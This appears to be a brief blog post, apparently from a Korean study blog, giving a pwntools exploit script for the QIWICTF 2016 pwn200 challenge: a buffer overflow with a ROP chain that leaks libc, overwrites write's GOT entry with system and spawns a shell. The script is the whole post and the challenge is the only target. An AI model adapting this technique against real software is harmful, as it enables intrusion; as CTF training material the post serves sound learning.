QIWICTF 2016 pwn200

CTF
QIWICTF 2016 pwn200

공부하자~~ 2019. 1. 23. 13:49
from pwn import *

r = process("./task_3")
elf = ELF("./task_3")

read_plt = elf.plt['read']
write_plt = elf.plt['write']
write_got = elf.got['write']
pppr = 0x0804855d
bss = elf.bss()
binsh = "/bin/sh\x00"

payload = "\x90"*140
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(write_got)
payload += p32(6)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(8)

payload += p32(write_plt)
payload += "\x90"*4
payload += p32(bss)

r.sendline(payload)

libc_write = u32(r.recv(4))
libc_system = libc_write - 0x9add0

log.info("libc_write = {}".format(hex(libc_write)))
log.info("libc_system = {}".format(hex(libc_system)))
r.send(p32(libc_system))
r.send(binsh)

r.interactive()